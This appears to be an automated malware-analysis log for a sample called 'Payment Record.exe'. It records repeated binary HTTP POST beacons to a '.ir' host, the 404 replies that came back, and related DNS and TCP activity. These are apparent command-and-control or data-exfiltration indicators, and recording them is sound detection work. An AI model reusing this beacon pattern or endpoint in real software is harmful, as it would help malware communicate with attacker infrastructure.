Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 161Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Payment Record.exe

Code function: 0_2_007122EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_007122EE

Source: global traffic

DNS traffic detected: DNS query: touxzw.ir

Source: unknown

HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 188Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:03:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RFAUUD0mBtUAeLvBCfLg4ztyEDP3FbRB4JqvBSAbweULvuVeZHiatAMVO20RkA7qyn7iIrK2z7pxoa7IVz9sSsKc6H2npgyngxpU%2FKPnp92YQgmoic8R1OW%2BN%2FI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91be9f3168b77293-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1986&rtt_var=993&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=426&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:03:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlHkPmAfYPk1qxdYGiczn%2Bh7jpV%2BIAXT7eMXiZAmfyjyLJhN0yrKdxpfoGJi7LEt6oni%2FAVS74reZ3Va6Tapu2l0YcYi7RAPkaPvZWO1tYx1pPXBW%2BIbQCasmWk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91be9f3d98f841ba-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1653&rtt_var=826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=426&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:03:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sDJoAwCo0P75TT45VShhig9Y9tLeld1%2BNXM2yNWowuIzqPStTd74OxAYzi0kxyV%2FLcrM2eXGIVylzKGWu%2F8B9z7pWJQhFw34n9P6dYFgVNe7XURMdO9QnA0O0Gg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91be9f5b5fba3f3b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1621&rtt_var=810&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:03:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BrAxnEqCRZhY4IJFw1A47Px68rGLUw76IcQtTpH%2BMLVzHRelc%2F%2B5FxMPkf5JRuUdZsyU%2BOdpb46KKSqUYlEPc3XNRK9ydyCu%2BCjqZLBLyWC%2FZzmGG3a9XDLzLTA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91be9f675aa33f3b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1712&rtt_var=856&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:03:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2wWlJ00SakndZ%2FTjfot%2FeD2iiar%2BBCoN0i3TaRhbTfKGPB7WEqTRkTpAnxo5h8nk%2BouTn87PPzir2lHx4jk25AAChdP6IBCNaIvtTepgUKciyR9Z4M23aI74qx0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91be9f73f9620fa8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1459&min_rtt=1459&rtt_var=729&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K0%2BGw10f%2BnKIA07XZnN7MtItaaVWCQzbVLYX4taKWY40s6LT5RX7ASD16vsP8AMai%2FxWvb2Hg9PnORYAzCwcGVZoitDd8J5SNcylQiPLTrfL3dWPIw3AXF9weKQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91be9f8bc8ed70a4-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2040&min_rtt=2040&rtt_var=1020&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ZWd926cxHz3DSAuOuXWjck08%2Btax3HUA3h2bb4%2BpSFFDtC9P8%2F%2FUxoD3pnMXCEHSIFwlkqpW%2FiQHZXOwzSUSiW30KPIhU2IUzfN6SKZW%2F4fMqqdU%2FLGSfZ7Kr0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91be9f9809f31899-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1601&rtt_var=800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RE2VBXoez16nIt3oq%2BVSj51IT5PQbClMyL0U2HjAFT%2Bn8q4r91nDXyiQjX5PKIlfujfIVZbVVRv5gwYdppsctExvivnQ5txh5rctSogzY3beKiyH21rA6LBGbDI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91be9fa53f6341ba-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2055&min_rtt=2055&rtt_var=1027&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2fntWByWpkbrE91fWTCBsEaIuvD8NXpRjlDOfJ7OZWNRkoLO0aIcnIFvlaEe1Yk%2F054rIcXvqJb6hIOhV6wppqfBLPvlHoW9IQbFhI2Q7eKijmr6T78sZV3AkE8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91be9fbd6a6f3f3b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1667&rtt_var=833&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oOGHvDAJDihC0aZs1LzlsRLf3cJ7Wf%2BBaa19C3GgxM2y2DPlwihEVbhKi3MbatGUDNK1FJqrTAonU7Ib34i1KCMXb16mXqlMIowpDkNk15YLFlz3PvVaTxP0gIc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91be9fc97da13f3b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1645&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0lVXVGhCL87tfphFGOZ2uRcRygETksMhP%2F4TTgcjbmLDkUNpJ%2B9AoG0l1okJy2ZQ5b%2FRYRI8lEllLVIsctQDTHwxzIkqRaSFhOgoiDOT08dYMZz%2FuNn%2FRfJ%2FVmI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91be9fd57b793f3b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1629&rtt_var=814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jVYZJiqjshvq%2BQfXIvtICq2ElIdq4tCpNrBveAi94Mf8hYwOWh01ztlC8%2FRfScsHtTfdK3N1yt0Hc5UTYW4BYyscpieVFYsPcFJOM3SHihG9%2BNp78oFgAm2vdro%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea00598c74388-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1567&rtt_var=783&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U88sVs6H2v0nVxKEhqlb6GIq3LuoLANU4uz0da7OITn2vvczhFfxJbH%2F4%2FSa5NnzOh6L2fXSvneo05HwGx18OTqW7cQBZjpbJ0z7IQJvg3AMs0HmRBwI13dWWsk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea011ad200fa8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1483&rtt_var=741&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OG%2BthYgLOi2yLtHh1ju7BtIMprOSdy20iUQfdOBHsbq%2FbQZ%2FCfjmw%2BYh%2BWnQJue16PLIVizC4hnN6etHY3v%2BYUdNzMbw9jIz52qV%2B4OykMf6QppeQcvk7hwVjws%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea02978f31899-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1740&min_rtt=1740&rtt_var=870&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F4%2BN180YjQhLVIXrr2WK2myX8fOC6iDSAJxDaQmbjA02W2MEG26Nys%2FTfPfgiojc2w%2F%2BuuSDcT72p3kDZj9AfxV0WePjfHPiuT8dYm3GJi6Nk9IHFh8QhiYOJMU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea0413e4b7293-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1931&rtt_var=965&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QFZnMF0f1x3pevBuK%2Bf6f1am2YkpqzC1CT2lGVquQ0WMBz%2FNCOa00zJGBILJYHIHqy7w%2B6%2BMdVkipEb86NlkMOQJ6VAekEBvTAyoybxw4BWrcaS2OFJFN35WEo4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea04e8e4f8ce0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1802&rtt_var=901&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 03:04:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a4ZgfosyVwRscRfknW%2BztejOntzKq%2Fh1bW3RC6SISfv97UX6N7kfJjIiAsPZyV6102YXKNB9Yie3HXIOHy0E15P6xwtAxJWbA2qjxdhNlmAVAfM8bAAbKp1OZWo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91bea05a7d1d8ce0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1779&min_rtt=1779&rtt_var=889&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
